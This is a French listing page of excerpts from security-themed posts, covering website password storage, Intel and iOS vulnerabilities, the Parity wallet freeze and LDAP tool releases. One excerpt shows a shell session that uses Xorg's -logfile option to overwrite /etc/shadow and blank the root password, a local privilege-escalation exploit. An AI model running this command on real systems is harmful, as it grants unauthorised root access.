Forum Programmation.web de la place des mots de passe dans un site web
Bonjour à tous
pour mon asso, je reprend la gestion du site web car la personne qui gérait ca est partie.
évidemment il n'a pas laissé tous les mots de passe en partant, et j'ai du fouillé un peu.
J'ai trouvé des mots de passe dans le code du site (genre config.php ou settings.php)
mais pour un sous site, j'ai trouvé ca en variable d'environnement apache.
Je me suis dit que c'était pas mal le coup des variables d'environnement car (…)
Automne, saison chaude chez Intel
Mardi 12 novembre, Arte diffuse le concert du Bal des enragés au Helfest 2019.
L’attention du public ainsi détournée, Intel en profite pour lancer une vague de correctifs, 77 correctifs, un grand nombre de CVE (des failles) y est dévoilé. Les failles concernent les processeurs eux‑mêmes (et microcontrôleurs) et les micrologiciels trop nombreux qui tournent dans vos cartes‐mères.
Lien Trousse de premiers secours numériques
Journal Une exploitation massive de failles dans iOS depuis plus de 2 ans
Google a publié, via le blog de projet zero, une analyse détaillée de plusieurs failles iOS qui ont été exploitées pendant plus de 2 ans pour récupérer massivement des données sur des milliers de terminaux :
https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html?m=1
Je ne sais pas vous, mais j'avais pour ma part l'image d'une plateforme assez solide niveau sécurité. L'analyse des failles montre qu'en fait, c'est loin d'être le cas.
À noter que plusieurs failles sont dans Safari, il semblerait qu'un bon moyen de se (…)
Lien Linux Privilege Escalation exploiting Sudo Rights
Lien Wayland can’t be keylogged, unlike X11.
Lien connect-or-cut : mini pare-feu sans privilège filtrant les connexions sortantes sous Unix et Windows
Journal La faille grosse comme une maison
[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
Lien Une plate-forme pour rassembler des schémas et des objets JSON liés à la sécurité
Lien Open Source Security Software
Journal Comment bloquer 280M de dollars en éther
Bonjour fameux Nal',
Aujourd'hui, enfin hier, un développeur a bloqué tous les portefeuilles Parity multisignés.
Grossièrement, il a modifié la lib de Parity et s'est octroyé la propriété de tous les portefeuilles multisignés avec Parity. Il a supprimé son contrat auto-exécutant ce qui bloqué tous les portefeuilles multisignés…
En résumé, le Tweet du concerné explique le résultat :
It's simple really, imagine walking up to a bank vault and there's a button that says "Lock Forever"……. someone accidentally pushes it.
Sortie de LDAP Tool Box Self Service Password 1.1
Le logiciel Self Service Password est développé au sein du projet LDAP Tool Box. Il fournit une interface permettant aux utilisateurs de changer leur mot de passe dans un annuaire LDAP, y compris Active Directory ou Samba 4, ainsi que leur clé SSH.
Outre le changement de mot de passe simple, l’interface propose de réinitialiser son mot de passe en cas de perte, soit par l’envoi d’un courriel, soit par la réponse à des questions, soit par l’envoi d’un SMS.
Les contraintes de qualité du mot de passe sont paramétrables : taille minimale, maximale, présence de différentes classes de caractères, caractères interdits, contrôle de la valeur par rapport à l’ancien mot de passe ou à l’identifiant.
Le logiciel Self Service Password est écrit en PHP et est sous licence publique générale GNU. La version 1.1 est sortie le 1er septembre 2017.
Sortie de LDAP Tool Box Self Service Password 1.0
Le logiciel Self Service Password est développé au sein du projet LDAP Tool Box. Il fournit une interface permettant aux utilisateurs de changer leur mot de passe dans un annuaire LDAP, y compris Active Directory ou Samba 4.
Outre le changement de mot de passe simple, l’interface propose de réinitialiser son mot de passe en cas de perte, soit par l’envoi d’un courriel, soit par la réponse à des questions, soit par l’envoi d’un SMS.
Les contraintes de qualité du mot de passe sont paramétrables : taille minimale, maximale, présence de différentes classes de caractères, caractères interdits, contrôle de la valeur par rapport à l’ancien mot de passe ou à l’identifiant.
Le logiciel Self Service Password est écrit en PHP et est sous licence publique générale GNU. La version 1.0 est sortie le 14 octobre 2016.
Demandez votre badge gratuit pour OW2con'16, les 21-22 septembre 2016, Espace Mozilla à Paris
Ne ratez pas OW2con'16, le rendez-vous annuel de la communauté open source OW2 !
OW2 est une communauté open source indépendante dédiée au développement de logiciels d'infrastructure de qualité industrielle. Elle regroupe des entreprises et des organismes de recherche de premier plan tels que l'Inria, Orange, Prologue, Institut Mines Telecom, Airbus Défense ou Peking University. Organisée pour la huitième année consécutive, la conférence annuelle OW2 est une rencontre d'experts, d'architectes, de développeurs et de chefs de projets du monde entier.
OW2con'16 est un rendez-vous de la communauté OW2 et des professionnels du logiciel open source, du cloud computing, du big data et de l'internet du futur. Cette année nous ajoutons l'accessibilité et la gestion de la sécurité à notre porte-feuille de sujets chauds.